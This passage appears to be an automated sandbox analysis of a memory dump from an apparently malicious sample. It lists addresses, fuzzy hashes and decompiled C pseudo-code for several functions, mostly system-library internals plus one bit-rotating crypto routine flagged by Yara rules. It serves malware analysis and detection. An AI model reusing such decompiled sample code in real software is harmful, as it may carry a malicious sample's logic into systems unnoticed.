0x01a55c80
0x01a129b8
0x01a129b8
0x01a129bb
0x01a129c0
0x01a129c5
0x01a129c6
0x01a129c6
0x01a129cb
0x00000000
0x00000000
0x01a129cd
0x01a129d0
0x01a129d9
0x01a129db
0x01a129dd
0x01a12a7f
0x01a12a84
0x01a12a87
0x01a12a89
0x01a55ca1
0x01a55ca3
0x00000000
0x01a12a8f
0x01a12a8f
0x00000000
0x01a12a8f
0x00000000
0x01a129e3
0x01a129e3
0x01a129e3
0x00000000
0x01a129e3
0x01a129dd
0x00000000
0x01a129db
0x01a129e6
0x01a129e9
0x01a129eb
0x01a129ed
0x01a129f3
0x01a129f5
0x01a129f8
0x01a129fa
0x01a12a97
0x01a12a9a
0x01a12a9d
0x01a12add
0x00000000
0x01a12a9f
0x01a12aa2
0x01a12aa5
0x01a12aa8
0x01a12aab
0x01a55cab
0x01a55caf
0x01a55cc5
0x01a55cda
0x01a55cdc
0x01a55cdf
0x01a55ce5
0x00000000
0x01a55ceb
0x01a55ced
0x01a55cee
0x00000000
0x01a55cee
0x01a55cb1
0x01a55cb4
0x01a55cb9
0x01a55cbb
0x00000000
0x01a55cbd
0x01a55cbd
0x00000000
0x01a55cbd
0x01a55cbb
0x01a12ab1
0x01a12ab1
0x01a12ac4
0x01a12ac6
0x01a12ac6
0x00000000
0x01a12ac6
0x01a12aab
0x00000000
0x01a12a00
0x01a12a09
0x01a12a0e
0x01a12a21
0x01a12a24
0x01a12a35
0x01a12a3a
0x01a12a3d
0x01a12a42
0x01a12a59
0x01a12a59
0x01a12a5c
0x01a12a5f
0x01a12a5f
0x01a129fa
0x01a129f3
0x01a12a64
0x01a12a64
0x01a12a6b
0x01a12a6b
0x01a12a6d
0x01a12a72
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8430dffccf96477da673b1f3eedc79de195260c74718a0427e6ed943a276475b
Instruction ID: 8fed9f4a84cb962892ec6099cc58e7322501504a35165837e6f7bb105dbf5e96
Opcode Fuzzy Hash: 8430dffccf96477da673b1f3eedc79de195260c74718a0427e6ed943a276475b
Instruction Fuzzy Hash: FA516C7290020AEFDF25DF59C980AEEBBB6FF48350F248156E914AB215C331D952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01A14D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01A14D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x1add360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E01A2FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1ad7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E01A2B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01A04620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E019ECCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E01A2B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E01A2F380(_t67 + 0xc, 0x19c5138, 0x10) == 0) {
								 *0x1ad60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01A14F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01A14E70(0x1ad86b0, 0x1a15690, 0, 0) != 0) {
					_t46 = E019ECCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01a14d3b
0x01a14d4d
0x01a14d53
0x01a14d58
0x01a14d65
0x01a14d6c
0x01a14d71
0x01a14d77
0x01a14d7f
0x01a14d8c
0x01a14d8e
0x01a14dad
0x01a14db0
0x01a14db7
0x01a14db8
0x01a14db9
0x01a14dba
0x01a14dbb
0x01a14dc1
0x01a14dc8
0x01a14dcc
0x01a14dd5
0x01a14dde
0x01a14ddf
0x01a14de0
0x01a14de1
0x01a14de6
0x01a14de7
0x01a14de9
0x01a14df3
0x00000000
0x00000000
0x01a56c7c
0x01a56c8a
0x01a56c8a
0x01a56c9d
0x01a56ca7
0x01a56cac
0x01a56cb2
0x01a56cb9
0x00000000
0x01a56cbf
0x01a56cbf
0x00000000
0x01a56cbf
0x01a56cb9
0x01a14dfb
0x01a56ccf
0x01a56cd3
0x01a14e32
0x01a14e39
0x01a56ce0
0x01a56cf2
0x01a56cf2
0x01a56ce0
0x01a14e3f
0x01a14e41
0x01a14e51
0x01a14e51
0x01a14e03
0x01a14e03
0x01a14e09
0x01a14e0f
0x01a14e57
0x00000000
0x00000000
0x01a14e1b
0x01a14e30
0x01a14e5b
0x01a14e5b
0x00000000
0x01a14e30
0x01a14e11
0x01a14e11
0x01a14e16
0x00000000
0x01a14e16
0x01a14e01
0x00000000
0x01a14e01
0x01a14da5
0x01a56c6b
0x00000000
0x01a14dab
0x01a14dab
0x00000000
0x01a14dab

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2807bee8f117074c74282c66890c311f23410405e655b95812de1051707132
Instruction ID: ff9d65b8bc580089548c897d66c78337254580e6ff4453ec2e2d8604934b1f4f
Opcode Fuzzy Hash: 2b2807bee8f117074c74282c66890c311f23410405e655b95812de1051707132
Instruction Fuzzy Hash: 5A4106B5A44318AFEB32DF1CCD80FA6B7B9EB49710F040099E9499B285D774DD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01A14BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01A14BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x1add360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E019ECC50(_t86);
					L11:
					return E01A2B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1ad8504
				E01A02280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E01A2FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E01A2B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01A04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E019ECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1ad8504
								E019FFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01A14F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01a14bad
0x01a14bbf
0x01a14bc2
0x01a14bc6
0x01a14bcd
0x01a14bd9
0x01a567fe
0x01a56800
0x01a14ccc
0x01a14ccd
0x01a14cb7
0x01a14cc9
0x01a14cc9
0x01a14bdf
0x01a14be5
0x00000000
0x00000000
0x01a14beb
0x01a14bef
0x00000000
0x00000000
0x01a14bf5
0x01a14bf9
0x01a14c06
0x01a14c0b
0x01a14c17
0x01a14c1c
0x01a14c1f
0x01a14c25
0x01a14c33
0x01a14c3d
0x01a14c40
0x01a14c43
0x01a14c47
0x01a14c4d
0x01a14c53
0x01a14c54
0x01a14c55
0x01a14c56
0x01a14c5b
0x01a14c5c
0x01a14c63
0x01a14c6b
0x00000000
0x00000000
0x01a56776
0x01a56784
0x01a56784
0x01a5679f
0x01a567a7
0x01a567af
0x01a567ce
0x00000000
0x01a567b1
0x01a567b7
0x01a567b8
0x01a567c1
0x01a567d3
0x01a567d9
0x01a567dd
0x01a14c94
0x01a14c94
0x01a14c98
0x01a14c9c
0x01a14ca3
0x01a567f4
0x01a567f4
0x01a14cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01a14cb5
0x01a14c79
0x01a14c7e
0x01a14c89
0x01a14c8b
0x01a14c8f
0x01a14c8f
0x00000000
0x01a14c89
0x01a567c3
0x00000000
0x01a567c3
0x01a567af
0x01a14c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af4ff7a0a4768b32e166d05e0fbe2b575840fca242dd3d03f0ab3148557067f
Instruction ID: 9bd2600dd8102e943332851d09138bbdfed353615024ee25598ecf7d2236e7a9
Opcode Fuzzy Hash: 9af4ff7a0a4768b32e166d05e0fbe2b575840fca242dd3d03f0ab3148557067f
Instruction Fuzzy Hash: 7041A235A042299BDB61DF6CCA40FEAB7B4EF49750F4500A5E908AB245EB74DE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 019F8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E019F8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x1add360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E01A2B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E019FE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x19c1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01A11DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01A23C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E019F8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x019f8a0a
0x019f8a1c
0x019f8a23
0x019f8a2e
0x019f8a30
0x019f8a36
0x019f8a3c
0x019f8a3e
0x019f8a4a
0x019f8a52
0x019f8a9c
0x019f8aae
0x019f8a58
0x019f8a5e
0x019f8a6a
0x019f8a6f
0x019f8a75
0x019f8a7d
0x019f8a85
0x019f8a86
0x019f8a89
0x019f8a93
0x019f8a99
0x019f8a9b
0x00000000
0x019f8aaf
0x019f8abe
0x019f8ac3
0x019f8acb
0x019f8ad7
0x019f8ae0
0x019f8af1
0x00000000
0x019f8af1
0x019f8acd
0x019f8ad5
0x019f8afb
0x019f8afd
0x019f8aff
0x019f8b07
0x019f8b22
0x019f8b24
0x019f8b2a
0x019f8b2e
0x019f8b3f
0x019f8b78
0x019f8b41
0x019f8b52
0x019f8b54
0x019f8b5c
0x019f8b74
0x019f8b74
0x019f8b5c
0x019f8b3f
0x019f8b5e
0x019f8b61
0x019f8b64
0x019f8b64
0x019f8b6c
0x019f8b6c
0x019f8b11
0x01a49cd5
0x01a49cd5
0x019f8b17
0x019f8b1a
0x019f8b1a
0x00000000
0x019f8ad5
0x019f8a89

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9c8a7dea2824f51c969f295992da530c5a950e5ee29b13501c4b1ebce84749
Instruction ID: 8b092afc4de18c6835bfa1f3903ef35b34c3f8df1f71bfc6ff8aac12518e633b
Opcode Fuzzy Hash: 0d9c8a7dea2824f51c969f295992da530c5a950e5ee29b13501c4b1ebce84749
Instruction Fuzzy Hash: 0E4171B1A0022DABDB64CF59C888AA9B7F8FB94301F1045E9DA1D97242E770DE84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01A669A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E01A669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x1add360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L019F6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01A66BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01A29980() >= 0) {
							E01A02280(_t56, 0x1ad8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x1ad8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x1ad8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E019EB6F0(0x19cc338, 0x19cc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01A29520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E01A295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E019FFFB0(_t68, _t77, 0x1ad8778);
				}
				_pop(_t78);
				return E01A2B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x01a669b5
0x01a669be
0x01a669c3
0x01a669c9
0x01a669cc
0x01a669d1
0x01a669d3
0x01a669de
0x01a669e1
0x01a669ea
0x01a669f6
0x01a669fe
0x01a66a13
0x01a66a14
0x01a66a15
0x01a66a16
0x01a66a1e
0x01a66a26
0x01a66a31
0x01a66a36
0x01a66a37
0x01a66a40
0x01a66a49
0x01a66a4a
0x01a66a53
0x01a66a59
0x01a66a5d
0x01a66a5e
0x01a66a64
0x01a66a67
0x01a66a6a
0x01a66a6d
0x01a66a70
0x01a66a77
0x01a66a7d
0x01a66a86
0x01a66a89
0x01a66a9c
0x01a66a9f
0x01a66aa2
0x01a66aa5
0x01a66aaf
0x01a66ab1
0x01a66ab8
0x01a66ab9
0x01a66abb
0x01a66abe
0x01a66ac5
0x01a66ac5
0x01a66aaf
0x01a66a40
0x01a66a26
0x01a669fe
0x01a66ace
0x01a66ad0
0x01a66ad3
0x01a66ad8
0x01a66adf
0x01a66adf
0x01a66ae8
0x01a66aef
0x01a66aef
0x01a66af9
0x01a66b06

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d07236211c7171352bba0aea430f0adbb036c3de3d030572d4fdd58e18893a8
Instruction ID: e1770ea2182d2eaa901ff3abacd3fc97c7ce4d72c159d708e160865329df56eb
Opcode Fuzzy Hash: 0d07236211c7171352bba0aea430f0adbb036c3de3d030572d4fdd58e18893a8
Instruction Fuzzy Hash: D2419FB1D01209AFDB20CFAAD940BFEBBF8FF58714F04812AE919A3240DB749905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00401030, Relevance: .1, Instructions: 108
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00401030(signed char* __eax) {
				signed char* _t37;
				unsigned int _t65;
				unsigned int _t73;
				unsigned int _t81;
				unsigned int _t88;
				signed char _t94;
				signed char _t97;
				signed char _t100;
				signed int _t116;

				_t37 = __eax;
				_t65 = ((((__eax[0xc] & 0x000000ff) << 0x00000008 | __eax[0xd] & 0x000000ff) & 0x0000ffff) << 0x00000008 | __eax[0xe] & 0xff) << 0x00000007 | (__eax[0xf] & 0x000000ff) >> 0x00000001;
				_t94 = __eax[0xb];
				if((_t94 & 0x00000001) != 0) {
					_t65 = _t65 | 0x80000000;
				}
				_t37[0xc] = _t65 >> 0x18;
				_t37[0xf] = _t65;
				_t37[0xd] = _t65 >> 0x10;
				_t73 = ((((_t37[8] & 0x000000ff) << 0x00000008 | _t37[9] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[0xa] & 0xff) << 0x00000007 | (_t94 & 0x000000ff) >> 0x00000001;
				_t97 = _t37[7];
				_t37[0xe] = _t65 >> 8;
				if((_t97 & 0x00000001) != 0) {
					_t73 = _t73 | 0x80000000;
				}
				_t37[8] = _t73 >> 0x18;
				_t37[0xb] = _t73;
				_t37[9] = _t73 >> 0x10;
				_t81 = ((((_t37[4] & 0x000000ff) << 0x00000008 | _t37[5] & 0x000000ff) & 0x0000ffff) << 0x00000008 | _t37[6] & 0xff) << 0x00000007 | (_t97 & 0x000000ff) >> 0x00000001;
				_t100 = _t37[3];
				_t37[0xa] = _t73 >> 8;
				if((_t100 & 0x00000001) != 0) {
					_t81 = _t81 | 0x80000000;
				}
				_t116 = _t37[2] & 0x000000ff;
				_t37[4] = _t81 >> 0x18;
				_t37[7] = _t81;
				_t37[5] = _t81 >> 0x10;
				_t88 = (((_t37[1] & 0x000000ff) << 0x00000008 | _t116) & 0x00ffffff | ( *_t37 & 0x000000ff) << 0x00000010) << 0x00000007 | (_t100 & 0x000000ff) >> 0x00000001;
				 *_t37 = _t88 >> 0x18;
				_t37[1] = _t88 >> 0x10;
				_t37[6] = _t81 >> 8;
				_t37[2] = _t88 >> 8;
				_t37[3] = _t88;
				return _t37;
			}

0x00401030
0x0040105b
0x0040105d
0x00401063
0x00401065
0x00401065
0x00401071
0x00401076
0x0040107c
0x004010ac
0x004010ae
0x004010b4
0x004010ba
0x004010bc
0x004010bc
0x004010cb
0x004010d0
0x004010d6
0x00401101
0x00401103
0x00401109
0x0040110f
0x00401111
0x00401111
0x00401117
0x00401120
0x00401128
0x0040112b
0x0040114f
0x00401156
0x0040115d
0x00401169
0x0040116c
0x0040116f
0x00401173

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction ID: 9ce4faf4bd6c29c48d5e9242fd1ccb7de96948774e055271f7c113e60250bd75
Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
Instruction Fuzzy Hash: 203180116596F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2BF, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf342e573e63b1db299fe13e1636fbcbb0dcb10065c44169cf3007d4268d858
Instruction ID: 5c9f0073a071cfb742b3b562fab13e8bb867440c78fd0366bfa777110f30c6e5
Opcode Fuzzy Hash: 4cf342e573e63b1db299fe13e1636fbcbb0dcb10065c44169cf3007d4268d858
Instruction Fuzzy Hash: 25319736558245CFC3219F78A0C12DAFBB0FF97710B1865EEC888AB522C3329446CB89

Uniqueness

Uniqueness Score: -1.00%

Function 01A23D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01A23D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E019F7B60(0, _t61, 0x19c11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E019F7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01A04620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01a23d4c
0x01a23d50
0x01a23d55
0x01a23d5e
0x01a5e79a
0x00000000
0x01a5e79a
0x01a23d68
0x01a5e789
0x01a23d9d
0x01a23da3
0x01a23daf
0x01a23db5
0x01a23dbc
0x01a23dc4
0x01a23dc9
0x01a23dce
0x01a5e7ae
0x01a5e7ae
0x01a23dde
0x01a23de2
0x01a23de7
0x01a23e0d
0x01a23e13
0x01a23e16
0x01a23e1e
0x01a23e25
0x01a23e28
0x00000000
0x00000000
0x01a23e2a
0x01a23e2f
0x01a23e37
0x01a23e37
0x00000000
0x01a23e37
0x01a23e31
0x00000000
0x01a23e31
0x01a23e20
0x01a23e20
0x01a23e35
0x00000000
0x01a23de9
0x01a23de9
0x01a23de9
0x01a23dee
0x01a23dfd
0x01a23dff
0x01a23e02
0x01a23e05
0x01a23e05
0x00000000
0x01a23df0
0x01a23de7
0x01a5e78f
0x01a5e794
0x01a23d79
0x01a23d84
0x01a23d89
0x01a23d8e
0x00000000
0x01a5e7a4
0x01a23d96
0x01a23d9a
0x00000000
0x01a23d9a
0x00000000
0x01a5e794
0x01a23d6e
0x01a23d73
0x00000000
0x01a5e7b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d6e36d84544e493c84b8719b0a42e02bb4323181cb3237594a0195e69e079d
Instruction ID: c845c1ca2831002ae532992e96bdf505faf85a07fb89f8a756cc2bc8a71fc3aa
Opcode Fuzzy Hash: 13d6e36d84544e493c84b8719b0a42e02bb4323181cb3237594a0195e69e079d
Instruction Fuzzy Hash: 7431C371A04625DBDB298F2DC841A7BBBF5FF8A700B09846EE949CB350E738D844C790

Uniqueness

Uniqueness Score: -1.00%

Function 01A1A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01A1A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x1ac0220);
				E01A3D08C(__ebx, __edi, __esi);
